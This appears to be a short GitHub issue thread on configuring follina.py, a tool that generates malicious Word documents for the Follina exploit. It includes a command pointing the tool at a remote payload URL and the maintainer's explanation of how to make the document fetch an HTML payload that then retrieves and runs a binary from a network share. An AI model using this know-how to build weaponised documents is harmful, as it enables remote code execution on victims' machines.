Using a remote binary

[GTP95]

Hello,

I'm trying to test the remote version of the exploit in a more realistic setting, i.e. I'm actually uploading an executable to a web server and trying to specify the url with the -u switch. But I get an error that says that I have to specify the executable:

$ python follina.py -t docx -m binary -u https://www.example.com/my_payload.exe
Binary mode requires a binary to be specified, e.g. -b '\\localhost\c$\Windows\System32\calc.exe'

My understanding is that by supplying an URL the script should generate an exploit that tries to retrieve the executable from the web server instead of searching locally, am I getting this wrong?

[chvancooten]

Hi @GTP95! The -u flag denotes where the document will try to retrieve the generated (HTML) payload from, it cannot be used to reference a binary directly. The -b flag is used to define where the generated HTML payload will retrieve the binary payload from, which is the flag that you are looking for. You can define a network share there for remote payload retrieval.

An example, if you are hosting the generated payload.html on a web server with domain, you could specify the -u flag to be https://www.yourdomain.com/payload. You can then use the -b flag to point to the binary on a network file share. Potentially you could use a public SMB server of WebDAV but this is untested.

Hope this clarifies things!

[GTP95]

Yes, I think I got it now. Thank you!